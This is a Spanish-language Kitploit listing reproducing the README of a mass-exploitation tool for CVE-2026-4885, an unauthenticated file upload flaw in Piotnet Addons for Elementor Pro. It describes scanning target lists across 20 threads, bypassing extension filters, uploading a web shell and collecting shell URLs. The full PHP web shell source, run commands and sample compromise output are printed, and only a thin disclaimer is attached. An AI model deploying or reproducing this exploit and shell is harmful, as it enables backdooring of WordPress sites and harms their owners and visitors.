Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2026-4885 — Piotnet Addons for Elementor Pro <= 7.1.70 - Subida de archivos arbitraria no autenticada mediante la carga de archivos del formulario | Kitploit
Herramientas/GitHubGitHub/jenderal92/cve-2026-4885
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónRed TeamingDesarrollo de Payloads
GitHubjenderal92/cve-2026-4885

CVE-2026-4885

Piotnet Addons for Elementor Pro <= 7.1.70 - Subida de archivos arbitraria no autenticada mediante la carga de archivos del formulario

Ver Repositorio
hace 2 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2026-4885 – Explotación masiva de Piotnet Addons para Elementor Pro

Carga arbitraria de archivos no autenticada que conduce a la ejecución remota de código (RCE) en Piotnet Addons for Elementor Pro ≤ 7.1.70.

Esta herramienta está diseñada para la explotación masiva – proporcione una lista de objetivos y automáticamente:

  • Detectar la versión del plugin (o asumir que es vulnerable si se encuentran recursos)
  • Realizar un reconocimiento avanzado para extraer post_id, form_id y el nombre correcto del campo de carga
  • Probar múltiples extensiones PHP (.phtml, .php3, .php4, .phps, .pht, .php2) para evadir filtros débiles
  • Subir un shell PHP con cabecera GIF89a (integrado, no se necesita archivo externo)
  • Filtrar la URL del shell subido mediante pafe_export_database
  • Verificar la ejecución del shell (busca la cadena Logic_Internet) y guardar la URL en shells.txt

⚠️ Descargo de responsabilidad
Esta herramienta es solo para pruebas de seguridad educativas y autorizadas.
El uso no autorizado contra sistemas que no posee es ilegal.

Puede ver más descargos de responsabilidad en la portada de Jenderal92. Puede consultarlo AQUÍ !!!


Features

  • Compatible con Python 2.7 (también funciona con Python 3 si ajusta print/input)
  • Multi-hilo – escanea y explota hasta 20 objetivos simultáneamente
  • Detección inteligente de formularios – analiza atributos HTML específicos de Piotnet (data-pafe-form-builder-field-name, data-elementor-id, etc.)
  • Sin archivo shell externo – el payload PHP está incrustado en el script
  • Esquema de URL automático – añade https:// si falta
  • Lista amplia de rutas – incluye 22 URL de formularios comunes (/contact, /apply, /quote, /book-appointment, …)
  • Patrón de filtración – coincide tanto con wp-content/uploads/piotnet-addons-for-elementor/ como con rutas raíz directas

Requisitos

  • Python 2.7 (o Python 3 con cambios menores)
  • Librería requests
root@kitploit:~
pip install requests

Instalación

root@kitploit:~
git clone https://github.com/Jenderal92/CVE-2026-4885.git
cd CVE-2026-4885

Uso

  1. Prepare un archivo de objetivos

Cree un archivo llamado targets.txt (o cualquier nombre) con una URL por línea:

root@kitploit:~
https://example1.com
example2.com
http://vulnerable-site.org
  1. Ejecute el exploit
root@kitploit:~
python2 CVE-2026-4885.py targets.txt

El script:

· Mostrará el progreso de cada objetivo · Guardará las URL de shell exitosas en shells.txt

Ejemplo de salida

root@kitploit:~
[*] Loaded built-in shell (598 bytes)
[*] scanning 25 pages...
[+] found form at https://target.com/contact | post_id=13 form_id=fa2c60e field=file
[*] post_id=13 form_id=fa2c60e field=file
[*] trying .phtml
[+] uploaded .phtml
[+] shell URL: https://target.com/wp-content/uploads/piotnet-addons-for-elementor/xxx-6a11e162a6099.phtml
[+] SHELL UPLOADED -> https://target.com/wp-content/uploads/piotnet-addons-for-elementor/xxx-6a11e162a6099.phtml

Opciones de línea de comandos (personalizables en el script)

Variable Descripción Por defecto TIMEOUT Tiempo de espera de la solicitud HTTP 10 segundos MAX_THREADS Número de hilos concurrentes 20 OUTPUT_FILE Dónde guardar las URL de shell exitosas shells.txt EXT_LIST Extensiones de archivo a probar .phtml, .php3, .php4, .phps, .pht, .php2

Puede cambiarlas editando la parte superior del script.


Carga útil del shell

El shell integrado es:

root@kitploit:~
GIF89a;
<?php
echo 'Logic_Internet'.'<br>'.'Uname:'.php_uname().'<br>'.$cwd = getcwd();
Echo '<center>  <form method="post" target="_self" enctype="multipart/form-data">  <input type="file" size="20" name="uploads" /> <input type="submit" value="upload" />  </form>  </center>'.'<br>';
if (!empty ($_FILES['uploads'])) {
    move_uploaded_file($_FILES['uploads']['tmp_name'],$_FILES['uploads']['name']);
    Echo "<script>alert('upload Done');</script><b>Uploaded !!!</b><br>name : ".$_FILES['uploads']['name']."<br>size : ".$_FILES['uploads']['size']."<br>type : ".$_FILES['uploads']['type'];
}
?>

· Muestra información del servidor, el directorio de trabajo actual y un formulario de carga de archivos. · Puede reemplazarse con cualquier otro código PHP (solo cambie SHELL_CODE en el script).


Cómo funciona

  1. Detección de versión · Busca ?ver= en los recursos del plugin en la página de inicio. · Como respaldo, comprueba la existencia de archivos CSS/JS conocidos.
  2. Reconocimiento · Rastrea páginas de formularios comunes y todos los enlaces internos encontrados en la página de inicio. · Extrae post_id, form_id y el nombre correcto del campo de carga de archivos a partir de atributos HTML específicos de Piotnet.
  3. Carga · Envía una solicitud POST multipart a wp-admin/admin-ajax.php?action=pafe_ajax_form_builder. · Utiliza un payload JSON que imita el mecanismo de carga del plugin. · Prueba todas las extensiones de EXT_LIST hasta que una tenga éxito.
  4. Filtración · Solicita pafe_export_database, que devuelve un CSV con la URL completa del archivo subido. · Analiza la URL usando un patrón de regex que coincide con xxx-{random}.ext.
  5. Verificación · Visita la URL filtrada. · Comprueba la presencia de la cadena Logic_Internet. · Guarda la URL en shells.txt si tiene éxito.

Solución de problemas

UnicodeEncodeError en Windows

El script ya incluye una función safe_unicode() que maneja caracteres no ASCII. Si aún ve errores, asegúrese de que su terminal admita UTF‑8:

root@kitploit:~
chcp 65001

No se encontró formulario / Todas las extensiones fallan

· El objetivo puede estar parcheado o no usar Piotnet Addons. · Intente aumentar TIMEOUT o MAX_THREADS. · Verifique manualmente que el plugin esté realmente instalado.

La filtración falla pero la carga tuvo éxito

· El endpoint de pafe_export_database podría estar deshabilitado o protegido. · Intente acceder a /wp-admin/admin-ajax.php?action=pafe_export_database manualmente en un navegador para ver si es accesible.


Uso legal y ético

· Utilice esta herramienta solo en sistemas sobre los que tenga permiso por escrito para realizar pruebas. · El autor no es responsable de ningún uso indebido o daño causado. · Respete todas las leyes aplicables.

Descargar herramienta